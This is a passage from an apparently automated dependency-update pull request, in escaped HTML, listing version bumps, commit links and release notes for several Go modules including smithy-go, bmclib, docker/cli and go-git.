href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1256\"\u003e#1256\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/aba2972a0d9bae8bdfc9eec8160b2d0eeef7c005\"\u003e\u003ccode\u003eaba2972\u003c/code\u003e\u003c/a\u003e Staging bundle with pkg ctlr fix (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1255\"\u003e#1255\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/47ceca1fb64f400921691bd097e482bd5b881746\"\u003e\u003ccode\u003e47ceca1\u003c/code\u003e\u003c/a\u003e fix imagePullSecret schema validation (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1254\"\u003e#1254\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/eks-anywhere-packages/commit/5c41ff81f07899eae8a27ed0cb629d28a96585f2\"\u003e\u003ccode\u003e5c41ff8\u003c/code\u003e\u003c/a\u003e Staging bundle with fixed packages (\u003ca href=\"https://redirect.github.com/aws/eks-anywhere-packages/issues/1253\"\u003e#1253\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/eks-anywhere-packages/compare/v0.4.5...v0.4.15\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-bootstrap-provider` from 1.0.17 to 1.0.19\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/a4b92b3f82826f1c85f473692d35e5311b04c7c4\"\u003e\u003ccode\u003ea4b92b3\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/50\"\u003e#50\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/2ee5467f5dc9940d86a4f1885e3f1612a8d1272e\"\u003e\u003ccode\u003e2ee5467\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-bootstrap-provider/issues/51\"\u003e#51\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/commit/e288bc1b6cd8867c52ae3da79bfb153913534f19\"\u003e\u003ccode\u003ee288bc1\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcdadm bootstrap mana...\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-bootstrap-provider/compare/v1.0.17...v1.0.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/etcdadm-controller` from 1.0.25 to 1.0.27\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/6795a4f86df4078f5258a25005028c6660fc36c8\"\u003e\u003ccode\u003e6795a4f\u003c/code\u003e\u003c/a\u003e Bump cluster-api version (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/75\"\u003e#75\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/72e7e5a190206423cea4519449b08a9c200971d4\"\u003e\u003ccode\u003e72e7e5a\u003c/code\u003e\u003c/a\u003e Adds subbu vakati to owners (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/74\"\u003e#74\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/etcdadm-controller/commit/d4476151cb03c0d699e5426632ff76a243ff0124\"\u003e\u003ccode\u003ed447615\u003c/code\u003e\u003c/a\u003e Add secure diagnostics endpoint with authentication to etcadm controller (\u003ca href=\"https://redirect.github.com/aws/etcdadm-controller/issues/73\"\u003e#73\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/etcdadm-controller/compare/v1.0.25...v1.0.27\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/smithy-go` from 1.20.3 to 1.24.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/smithy-go/releases\"\u003egithub.com/aws/smithy-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease (2026-02-27)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Bump minimum go version to 1.24.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease (2026-02-20)\u003c/h1\u003e\n\u003ch2\u003eGeneral Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eDependency Update\u003c/strong\u003e: Updated to the latest SDK module versions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eModule Highlights\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003egithub.com/aws/smithy-go\u003c/code\u003e: v1.24.1\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eFeature\u003c/strong\u003e: Add new middleware functions to get event stream output from middleware\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/b860661df961e236ca154f5a66e1f01216639738\"\u003e\u003ccode\u003eb860661\u003c/code\u003e\u003c/a\u003e Release 2026-02-27\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/567846b9a9de2906faffe420719177aece913452\"\u003e\u003ccode\u003e567846b\u003c/code\u003e\u003c/a\u003e Bump minimun Go version to 1.24 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/629\"\u003e#629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/8c6355875a5c602fa6c2d9093e2b46e69e4d38f4\"\u003e\u003ccode\u003e8c63558\u003c/code\u003e\u003c/a\u003e Release 2026-02-20\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c6d1144762205b31f9d511b1525eb67b0c4c1e4c\"\u003e\u003ccode\u003ec6d1144\u003c/code\u003e\u003c/a\u003e Create new event stream generator (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/626\"\u003e#626\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/f82babd3fee1cc95f6974716ba570c1d4f72e8a1\"\u003e\u003ccode\u003ef82babd\u003c/code\u003e\u003c/a\u003e update Smithy version to 1.67.0 (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/627\"\u003e#627\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/708bee3fd23f247fe0b019ae3fbb9dd7837117bc\"\u003e\u003ccode\u003e708bee3\u003c/code\u003e\u003c/a\u003e move writable and chainwritable up (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/622\"\u003e#622\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/7bfe108d0fa9790e554d201e80faa6b8051569d0\"\u003e\u003ccode\u003e7bfe108\u003c/code\u003e\u003c/a\u003e Add support for OrExpression JMESPath (\u003ca href=\"https://redirect.github.com/aws/smithy-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/9dbc5b22fed45a861a3782db7642bec232c5b0b3\"\u003e\u003ccode\u003e9dbc5b2\u003c/code\u003e\u003c/a\u003e bump smithy to v1.64.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/71f5bff362491399f8a2cca586c5802eb5a66d70\"\u003e\u003ccode\u003e71f5bff\u003c/code\u003e\u003c/a\u003e Release 2025-12-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/smithy-go/commit/c94c177cfcf46095d48a88253899242f5971ae1b\"\u003e\u003ccode\u003ec94c177\u003c/code\u003e\u003c/a\u003e changelog\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/smithy-go/compare/v1.20.3...v1.24.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/bmc-toolbox/bmclib/v2` from 2.1.1-0.20231206130132-1063371b9ed6 to 2.3.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/bmc-toolbox/bmclib/releases\"\u003egithub.com/bmc-toolbox/bmclib/v2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.3.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFix SetBiosFromFile by \u003ca href=\"https://github.com/jakeschuurmans\"\u003e\u003ccode\u003e@​jakeschuurmans\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/403\"\u003ebmc-toolbox/bmclib#403\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci(mergify): upgrade configuration to current format by \u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix media mounting eject implementation: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/406\"\u003ebmc-toolbox/bmclib#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump golang.org/x/crypto from 0.23.0 to 0.31.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eNil pointer safety by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/408\"\u003ebmc-toolbox/bmclib#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate dependencies: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/409\"\u003ebmc-toolbox/bmclib#409\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate virtual media ejecting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/410\"\u003ebmc-toolbox/bmclib#410\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEnables support for supermicro x11ssl-f and x11scz-f by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/411\"\u003ebmc-toolbox/bmclib#411\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove virtual media ejecting and inserting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/412\"\u003ebmc-toolbox/bmclib#412\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved power state limitations from RPC provider by \u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCheck power state before issuing power off for ipmi: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/417\"\u003ebmc-toolbox/bmclib#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove sshclient package: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/420\"\u003ebmc-toolbox/bmclib#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix mergify configuration issue: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/425\"\u003ebmc-toolbox/bmclib#425\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDon't use all systems when no match is found: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/422\"\u003ebmc-toolbox/bmclib#422\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Redfish] Add support for UefiHttp boot by \u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.4.0+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/9d7ad9ff180b43ae5577d048a7bac1159ce7bacf\"\u003e\u003ccode\u003e9d7ad9f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6911\"\u003e#6911\u003c/a\u003e from thaJeztah/bump_modules\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c88681f8d89a9dd1f24f7bbd4df947aed2e4faf3\"\u003e\u003ccode\u003ec88681f\u003c/code\u003e\u003c/a\u003e vendor: moby/api v1.54.1, moby/client v0.4.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/84b884f383a427627ea2c40c1a31905cd958384f\"\u003e\u003ccode\u003e84b884f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6909\"\u003e#6909\u003c/a\u003e from thaJeztah/update_authors_mailmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d6169a5ea986d888d0e8c51c9c891d774aa7657b\"\u003e\u003ccode\u003ed6169a5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6910\"\u003e#6910\u003c/a\u003e from thaJeztah/update_version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/5ddc1553ae6d435203f40f7bf622062df246071a\"\u003e\u003ccode\u003e5ddc155\u003c/code\u003e\u003c/a\u003e bump version to v29.4.0-dev\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/a347d9e103f0be3170dc18d0ec77e788c7fe9749\"\u003e\u003ccode\u003ea347d9e\u003c/code\u003e\u003c/a\u003e update AUTHORS and .mailmap\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/699b029b57bc31f2a0c5ecff00f89493b2448047\"\u003e\u003ccode\u003e699b029\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6908\"\u003e#6908\u003c/a\u003e from thaJeztah/bump_runewidth\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/512607a39638c961cff762c3239b3d1127e25e16\"\u003e\u003ccode\u003e512607a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6889\"\u003e#6889\u003c/a\u003e from YoanWai/docs/prune-filter-behavior\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/5fca671ef4110b2bebce70be06a1d41241933871\"\u003e\u003ccode\u003e5fca671\u003c/code\u003e\u003c/a\u003e vendor: github.com/mattn/go-runewidth v0.0.22\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/753b10228f353c3a8cd90e7e0292ee732798e8d5\"\u003e\u003ccode\u003e753b102\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6893\"\u003e#6893\u003c/a\u003e from thaJeztah/bump_moby\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.17.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/45ae193b3a60aa8ec8a3e373f7265a7819473d5f\"\u003e\u003ccode\u003e45ae193\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1944\"\u003e#1944\u003c/a\u003e from go-git/fix-perms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fda4f7464b597ff33d2dea1c026482a5e900037c\"\u003e\u003ccode\u003efda4f74\u003c/code\u003e\u003c/a\u003e storage: filesystem/dotgit, Skip writing pack files that already exist on disk\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/2212dc7caeb2a389fe2129923811ef63f75a557a\"\u003e\u003ccode\u003e2212dc7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1941\"\u003e#1941\u003c/a\u003e from go-git/renovate/releases/v5.x-go-github.com-go-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ebb2d7da7f5d5aebeaa0b5e13276d72d602c1ae3\"\u003e\u003ccode\u003eebb2d7d\u003c/code\u003e\u003c/a\u003e build: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY]\u003c/li\u003e\n\u003cli\u003eSee full diff in 